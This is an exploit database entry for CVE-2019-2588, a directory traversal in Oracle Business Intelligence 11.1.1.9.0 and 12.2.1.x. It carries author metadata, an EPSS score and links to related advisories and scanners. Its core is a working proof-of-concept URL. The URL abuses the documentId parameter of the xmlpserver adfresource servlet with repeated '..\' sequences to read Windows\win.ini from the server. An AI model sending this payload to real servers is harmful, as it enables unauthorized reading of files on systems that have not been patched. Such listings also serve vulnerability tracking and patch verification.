Lucene search
Vahagn Vardanyan1337DAY-ID-32573HistoryApr 19, 2019 - 12:00 a.m.
Oracle Business Intelligence 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - Directory Traversal Exploit
2019-04-1900:00:00
Vahagn Vardanyan
0day.today
182
0.084 Low
EPSS
Percentile
93.8%
Exploit for windows platform in category web applications
# Exploit Title: Directory traversal in Oracle Business Intelligence
# Exploit Author: @vah_13
# Vendor Homepage: http://oracle.com
# Software Link:
https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
# Tested on: Windows
# CVE : CVE-2019-2588
PoC
http://server:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini
# 0day.today [2019-04-19] #Related
prion
prion
Design/Logic Flaw
2019-04-23 19:32:00
cve
cve
CVE-2019-2588
2019-04-23 19:32:00
packetstorm
packetstorm
Oracle Business Intelligence Directory Traversal
2019-04-19 00:00:00
exploitpack
exploitpack
nuclei
nuclei
Oracle Business Intelligence - Path Traversal
2020-06-22 13:35:37
exploitdb
exploitdb
nessus
nessus
oracle
oracle
Oracle Critical Patch Update Advisory - April 2019
2019-04-16 00:00:00